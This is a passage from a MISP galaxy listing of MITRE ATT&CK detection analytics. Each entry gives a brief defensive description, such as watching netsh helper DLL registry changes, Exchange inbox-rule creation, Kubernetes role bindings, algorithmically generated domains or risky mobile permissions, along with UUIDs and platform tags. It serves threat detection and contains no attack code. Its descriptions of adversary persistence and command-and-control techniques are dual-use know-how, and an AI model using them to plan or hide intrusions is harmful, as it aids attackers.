UUID 52ee5593-7db2-4ad0-b5f4-630ebcf2ce0f which can be used as unique global reference for Analytic 1578 - AN1578 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1578
mitre_platforms ['Containers']

Analytic 1587 - AN1587

Execution of discovery commands like show cdp neighbors, show arp, and other interface-level introspection on Cisco or Juniper devices.

Internal MISP references

UUID aad71d3e-93b0-4cb6-8240-274369f8ad34 which can be used as unique global reference for Analytic 1587 - AN1587 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1587
mitre_platforms ['Network Devices']

Analytic 1785 - AN1785

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID 9c721bd4-75df-4381-bd70-29679aa78a4b which can be used as unique global reference for Analytic 1785 - AN1785 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1785
mitre_platforms ['iOS']

Analytic 1758 - AN1758

Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.

Internal MISP references

UUID f463fae8-5697-4539-b6c7-e67aadf81c73 which can be used as unique global reference for Analytic 1758 - AN1758 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1758
mitre_platforms ['Android']

Analytic 1579 - AN1579

Detects assignment of high-privilege roles to user or service accounts via Kubernetes RoleBinding or ClusterRoleBinding objects, especially outside of CI/CD automation or from unknown IPs.

Internal MISP references

UUID b721ae18-79fc-4b82-8991-93980b14ded5 which can be used as unique global reference for Analytic 1579 - AN1579 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1579
mitre_platforms ['Containers']

Analytic 1597 - AN1597

Detect loading or inspection of kernel extensions (kextstat, kextfind) and file access to /System/Library/Extensions/. Monitor unexpected usage of these utilities by non-administrative users or scripts.

Internal MISP references

UUID d9ee822c-6a91-4c83-9698-779ca0bf8663 which can be used as unique global reference for Analytic 1597 - AN1597 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1597
mitre_platforms ['macOS']

Analytic 1975 - AN1975

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID e9808ca9-3019-4395-b2d8-717f5d4863fe which can be used as unique global reference for Analytic 1975 - AN1975 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1975
mitre_platforms ['PRE']

Analytic 1957 - AN1957

If infrastructure or patterns in the malicious web content utilized to deliver a Drive-by Compromise have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as Drive-by Compromise or Exploitation for Client Execution.

Internal MISP references

UUID f1e4a6ae-86b5-4cf1-a044-0ffc6551196e which can be used as unique global reference for Analytic 1957 - AN1957 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1957
mitre_platforms ['PRE']

Analytic 1759 - AN1759

Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.

Internal MISP references

UUID 1076f33e-a959-49b8-97a3-2edf0360fae2 which can be used as unique global reference for Analytic 1759 - AN1759 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1759
mitre_platforms ['iOS']

Analytic 1795 - AN1795

Application vetting services could look for android.permission.READ_SMS in an Android application’s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 421fc6dc-1275-4eca-9950-150ad27d9bfd which can be used as unique global reference for Analytic 1795 - AN1795 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1795
mitre_platforms ['Android']

Analytic 1588 - AN1588

Detection focuses on monitoring registry modifications under HKLM\SOFTWARE\Microsoft\Netsh that indicate the addition of helper DLLs, followed by anomalous child process activity or module load behavior initiated by netsh.exe. These behaviors are rarely legitimate and may represent an adversary establishing persistence.

Internal MISP references

UUID 5ca1b37f-31c9-414b-9a31-9f80f553c44a which can be used as unique global reference for Analytic 1588 - AN1588 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1588
mitre_platforms ['Windows']

Analytic 1985 - AN1985

Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Consider use of services that may aid in the tracking of capabilities, such as certificates, in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.

Internal MISP references

UUID 97b0c549-88d2-4739-a081-a9113e25cf1a which can be used as unique global reference for Analytic 1985 - AN1985 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1985
mitre_platforms ['PRE']

Analytic 1958 - AN1958

Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID ae4f420e-1d38-4f6e-b4b6-4b0932f596e7 which can be used as unique global reference for Analytic 1958 - AN1958 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1958
mitre_platforms ['PRE']

Analytic 1598 - AN1598

Detects registration of new or modified network provider DLLs via registry changes, anomalous file creation of DLLs in system directories, and suspicious process activity (mpnotify.exe interacting with non-standard DLLs). Multi-event correlation ties registry modification events to subsequent DLL loads during user logon activity.

Internal MISP references

UUID c94f0795-ef0b-4e22-8395-bbba4f28346f which can be used as unique global reference for Analytic 1598 - AN1598 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1598
mitre_platforms ['Windows']

Analytic 1589 - AN1589

Creation of inbox rules via PowerShell (New-InboxRule) or transport rules using Exchange cmdlets. Correlates user behavior, cmdlet usage, and rule properties.

Internal MISP references

UUID fe489775-b01e-4da2-a0e2-962d1572ba09 which can be used as unique global reference for Analytic 1589 - AN1589 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1589
mitre_platforms ['Windows']

Analytic 1995 - AN1995

Monitor for logged or queried domain name system (DNS) registry data that may indicate hijacked domains and/or subdomains that can be used during targeting. In some cases, abnormal subdomain IP addresses (such as those originating in a different country from the root domain) may indicate a malicious subdomain.(Citation: Palo Alto Unit 42 Domain Shadowing 2022) Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest, as benign registration and resolution changes are a common occurrence on the internet. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 0cadbf9f-befa-4bd8-85b8-e5af53383953 which can be used as unique global reference for Analytic 1995 - AN1995 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1995
mitre_platforms ['PRE']

Analytic 1959 - AN1959

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 41990c88-06e2-4453-88bf-6bebe776a9a1 which can be used as unique global reference for Analytic 1959 - AN1959 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1959
mitre_platforms ['PRE']

Analytic 1599 - AN1599

Suspicious process initiating outbound connections to web services without corresponding response or return traffic, indicative of one-way command channels.

Internal MISP references

UUID 8626f553-efed-4418-bbc6-b9fa83b0b315 which can be used as unique global reference for Analytic 1599 - AN1599 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1599
mitre_platforms ['Windows']

Analytic 1666 - AN1666

The user can view applications that have registered accessibility services in the accessibility menu within the device settings.

Internal MISP references

UUID dda0e909-cceb-40eb-bff0-6bd0cd74e638 which can be used as unique global reference for Analytic 1666 - AN1666 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1666
mitre_platforms ['Android']

Analytic 1766 - AN1766

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.

Internal MISP references

UUID 4cb75669-f88d-4374-be51-e4b99e22b64e which can be used as unique global reference for Analytic 1766 - AN1766 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1766
mitre_platforms ['iOS']

Analytic 1667 - AN1667

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.

Internal MISP references

UUID 729a7413-3c5b-4637-a97b-9bba9f7734a7 which can be used as unique global reference for Analytic 1667 - AN1667 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1667
mitre_platforms ['Android']

Analytic 1676 - AN1676

Many properly configured firewalls may naturally block command and control traffic. Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.

Internal MISP references

UUID acc1bb20-bd46-4228-abba-f4befe82e926 which can be used as unique global reference for Analytic 1676 - AN1676 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1676
mitre_platforms ['iOS']

Analytic 1686 - AN1686

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 76cb5e62-9291-411d-90bf-57642b63f8b8 which can be used as unique global reference for Analytic 1686 - AN1686 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1686
mitre_platforms ['iOS']

Analytic 1668 - AN1668

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.

Internal MISP references

UUID c56cfd62-b8cb-49be-820b-e447a1605106 which can be used as unique global reference for Analytic 1668 - AN1668 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1668
mitre_platforms ['iOS']

Analytic 1966 - AN1966

If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as Ingress Tool Transfer.

Internal MISP references

UUID 4403499c-b81c-4d0e-896c-67178547ac18 which can be used as unique global reference for Analytic 1966 - AN1966 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1966
mitre_platforms ['PRE']

Analytic 1669 - AN1669

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 3723c7a3-2ea7-455f-aec5-29300cb7ae64 which can be used as unique global reference for Analytic 1669 - AN1669 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1669
mitre_platforms ['Android']

Analytic 1696 - AN1696

On Android, the user can review which applications have Device Administrator access in the device settings and revoke permission where appropriate. Application vetting services can detect and closely scrutinize applications that utilize Device Administrator access.

Internal MISP references

UUID 4a7169fa-79d4-4724-ad55-6e9842b7cb94 which can be used as unique global reference for Analytic 1696 - AN1696 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1696
mitre_platforms ['iOS']

Analytic 1677 - AN1677

Application vetting services may be able to list domains and/or IP addresses that applications communicate with. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of DexClassLoader, System.load, or the WebView JavaScriptInterface capability; on iOS, use of JSPatch or similar capabilities).

Internal MISP references

UUID 7b4c77fd-f350-48ec-abce-aac3e35c939f which can be used as unique global reference for Analytic 1677 - AN1677 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1677
mitre_platforms ['Android']

Analytic 1776 - AN1776

In both Android (6.0 and up) and iOS, the user can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. Android applications requesting the ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION, or ACCESS_BACKGROUND_LOCATION permissions and iOS applications including the NSLocationWhenInUseUsageDescription, NSLocationAlwaysAndWhenInUseUsageDescription, and/or NSLocationAlwaysUsageDescription keys in their Info.plist file could be scrutinized during the application vetting process.

Internal MISP references

UUID 83b759ca-097c-4d9f-926b-fb41e0740644 which can be used as unique global reference for Analytic 1776 - AN1776 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1776
mitre_platforms ['Android']

Analytic 1767 - AN1767

Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.

Internal MISP references

UUID bfa12b75-13ab-409f-8fe9-a93c8bcac466 which can be used as unique global reference for Analytic 1767 - AN1767 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1767
mitre_platforms ['Android']

Analytic 1768 - AN1768

Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.

Internal MISP references

UUID 1e72355d-3350-4b60-8c92-2ded50a3fdd1 which can be used as unique global reference for Analytic 1768 - AN1768 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1768
mitre_platforms ['iOS']

Analytic 1687 - AN1687

Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. On both Android and iOS, the user must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. The user can see registered VPN services in the device settings.

Internal MISP references

UUID 384bbe3f-bb48-4bf3-927e-3a95d13eae82 which can be used as unique global reference for Analytic 1687 - AN1687 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1687
mitre_platforms ['Android']

Analytic 1786 - AN1786

The user can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. Certain dangerous permissions, such as RECEIVE_SMS, could receive additional scrutiny.

Internal MISP references

UUID 99227275-37f5-400f-95ae-b5e17abfb0fd which can be used as unique global reference for Analytic 1786 - AN1786 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1786
mitre_platforms ['Android']

Analytic 1678 - AN1678

Application vetting services may be able to list domains and/or IP addresses that applications communicate with. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of DexClassLoader, System.load, or the WebView JavaScriptInterface capability; on iOS, use of JSPatch or similar capabilities).

Internal MISP references

UUID b6d9d5a1-5966-4888-b4ce-30b125043c4d which can be used as unique global reference for Analytic 1678 - AN1678 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1678
mitre_platforms ['iOS']

Analytic 1976 - AN1976

Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Detection efforts may be focused on related behaviors, such as Web Protocols, Asymmetric Cryptography, and/or Install Root Certificate.

Internal MISP references

UUID 06c3cd77-148a-424e-a55e-1e11ff3d9504 which can be used as unique global reference for Analytic 1976 - AN1976 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1976
mitre_platforms ['PRE']

Analytic 1967 - AN1967

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).

Internal MISP references

UUID 8619af40-05db-49a7-b7b8-476facfd4b2c which can be used as unique global reference for Analytic 1967 - AN1967 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1967
mitre_platforms ['PRE']

Analytic 1679 - AN1679

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID 04fbc0f1-82f0-4311-9c39-6b519b48e7d8 which can be used as unique global reference for Analytic 1679 - AN1679 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1679
mitre_platforms ['Android']

Analytic 1769 - AN1769

The user may view applications with administrator access through the device settings and may also notice if user data is inexplicably missing. Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant the MTD agents access to running processes and their parameters, potentially detecting file deletion processes.
The user is prompted for approval when an application requests device administrator permissions. Application vetting services may detect API calls for deleting files.
Mobile security products can detect which applications can request device administrator permissions. Application vetting services could apply extra scrutiny to applications that request device administrator permissions.

Internal MISP references

UUID 44d378d8-575b-41c8-b75c-375abcf3e2db which can be used as unique global reference for Analytic 1769 - AN1769 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1769
mitre_platforms ['Android']

Analytic 1796 - AN1796

Application vetting services could look for android.permission.READ_SMS in an Android application’s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID b1674dca-753f-45d9-b0de-4c68e459f046 which can be used as unique global reference for Analytic 1796 - AN1796 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1796
mitre_platforms ['iOS']

Analytic 1697 - AN1697

Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps.

Internal MISP references

UUID c1cdc6fb-9b7f-4076-9634-c939ddaef2bf which can be used as unique global reference for Analytic 1697 - AN1697 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1697
mitre_platforms ['Android']

Analytic 1688 - AN1688

Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. On both Android and iOS, the user must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. The user can see registered VPN services in the device settings.

Internal MISP references

UUID 36ca4ab8-1a16-4989-89e6-8d20c514c8c7 which can be used as unique global reference for Analytic 1688 - AN1688 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1688
mitre_platforms ['iOS']

Analytic 1986 - AN1986

Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 4dbe3d83-4e01-455f-94f2-a1a31b410b47 which can be used as unique global reference for Analytic 1986 - AN1986 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1986
mitre_platforms ['PRE']

Analytic 1968 - AN1968

If infrastructure or patterns in the malicious web content related to malvertising have been previously identified, internet scanning may uncover when an adversary has staged malicious web content. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as Drive-by Compromise or Exploitation for Client Execution.

Internal MISP references

UUID 81f695b5-7621-4a82-8036-536c6687b5b4 which can be used as unique global reference for Analytic 1968 - AN1968 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1968
mitre_platforms ['PRE']

Analytic 1689 - AN1689

Remote access software typically requires many privileged permissions, such as accessibility services or device administrator.

Internal MISP references

UUID 4d499685-2a71-4d66-8b44-fae780c3e998 which can be used as unique global reference for Analytic 1689 - AN1689 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1689
mitre_platforms ['Android']

Analytic 1698 - AN1698

Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps.

Internal MISP references

UUID 9aa716a2-0301-49cd-89c0-a441e5da0551 which can be used as unique global reference for Analytic 1698 - AN1698 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1698
mitre_platforms ['iOS']

Analytic 1969 - AN1969

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Phishing, Endpoint Denial of Service, or Network Denial of Service.

Internal MISP references

UUID 1b067cad-c75b-484e-8aaa-4b058c8ec9f7 which can be used as unique global reference for Analytic 1969 - AN1969 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1969
mitre_platforms ['PRE']

Analytic 1996 - AN1996

Once adversaries leverage serverless functions as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle.

Internal MISP references

UUID fd652339-e12f-4295-b843-0665680054bd which can be used as unique global reference for Analytic 1996 - AN1996 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1996
mitre_platforms ['PRE']

Analytic 1699 - AN1699

Network traffic analysis may reveal processes communicating with malicious domains.

Internal MISP references

UUID 9a574586-2729-4e60-8e60-5e07f200c3ff which can be used as unique global reference for Analytic 1699 - AN1699 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1699
mitre_platforms ['Android']

Analytic 1777 - AN1777

In both Android (6.0 and up) and iOS, the user can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. Android applications requesting the ACCESS_COARSE_LOCATION, ACCESS_FINE_LOCATION, or ACCESS_BACKGROUND_LOCATION permissions and iOS applications including the NSLocationWhenInUseUsageDescription, NSLocationAlwaysAndWhenInUseUsageDescription, and/or NSLocationAlwaysUsageDescription keys in their Info.plist file could be scrutinized during the application vetting process.

Internal MISP references

UUID f34fef81-f714-4e26-ae99-3c970959cd0d which can be used as unique global reference for Analytic 1777 - AN1777 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1777
mitre_platforms ['iOS']

Analytic 1778 - AN1778

An Android user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). Application vetting services can look for applications requesting the android.permission.SYSTEM_ALERT_WINDOW permission in the list of permissions in the app manifest.

Internal MISP references

UUID 2867d1e0-cf83-4d83-bc6c-cc03404c3521 which can be used as unique global reference for Analytic 1778 - AN1778 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1778
mitre_platforms ['Android']

Analytic 1787 - AN1787

The user can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. Certain dangerous permissions, such as RECEIVE_SMS, could receive additional scrutiny.

Internal MISP references

UUID 72604d06-ac1b-4d57-adb4-f303f2f82055 which can be used as unique global reference for Analytic 1787 - AN1787 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1787
mitre_platforms ['iOS']

Analytic 1977 - AN1977

Monitor for contextual data about a malicious payload, such as compilation times and file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle. Consider analyzing malware for features that may be associated with malware providers, such as the compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)

Internal MISP references

UUID de93de79-3f24-4022-9b03-7228ffacca6f which can be used as unique global reference for Analytic 1977 - AN1977 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1977
mitre_platforms ['PRE']

Analytic 1779 - AN1779

An Android user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). Application vetting services can look for applications requesting the android.permission.SYSTEM_ALERT_WINDOW permission in the list of permissions in the app manifest.

Internal MISP references

UUID 8062d295-9d02-40c5-9ef9-135d08c07a22 which can be used as unique global reference for Analytic 1779 - AN1779 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1779
mitre_platforms ['iOS']

Analytic 1797 - AN1797

Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense) Mobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running.

Internal MISP references

UUID e13d662d-a496-4997-b26a-39e71eb17fc2 which can be used as unique global reference for Analytic 1797 - AN1797 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1797
mitre_platforms ['Android']

Analytic 1788 - AN1788

On Android, the user is presented with a permissions popup when an application requests access to external device storage.

Internal MISP references

UUID 36cb5f92-996c-42f4-be7e-43c5e21eee2e which can be used as unique global reference for Analytic 1788 - AN1788 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1788
mitre_platforms ['Android']

Analytic 1987 - AN1987

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 058452ee-f484-4e2f-b2ad-d562e34847fb which can be used as unique global reference for Analytic 1987 - AN1987 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1987
mitre_platforms ['PRE']

Analytic 1978 - AN1978

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: Transfer Data to Cloud Account).

Internal MISP references

UUID 97ec7ade-18b7-43b7-b267-85470862b6ac which can be used as unique global reference for Analytic 1978 - AN1978 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1978
mitre_platforms ['PRE']

Analytic 1789 - AN1789

On Android, the user is presented with a permissions popup when an application requests access to external device storage.

Internal MISP references

UUID 0048442c-54c9-4816-a2ba-5e9d376d0bf2 which can be used as unique global reference for Analytic 1789 - AN1789 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1789
mitre_platforms ['iOS']

Analytic 1798 - AN1798

If the user sees a notification with text they do not recognize, they should review their list of installed applications.

Internal MISP references

UUID f1e295df-0598-4263-b7c4-737d66660bbe which can be used as unique global reference for Analytic 1798 - AN1798 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1798
mitre_platforms ['Android']

Analytic 1979 - AN1979

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 4ba44323-b5b0-46c9-be94-f2c5d0fdbec5 which can be used as unique global reference for Analytic 1979 - AN1979 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1979
mitre_platforms ['PRE']

Analytic 1997 - AN1997

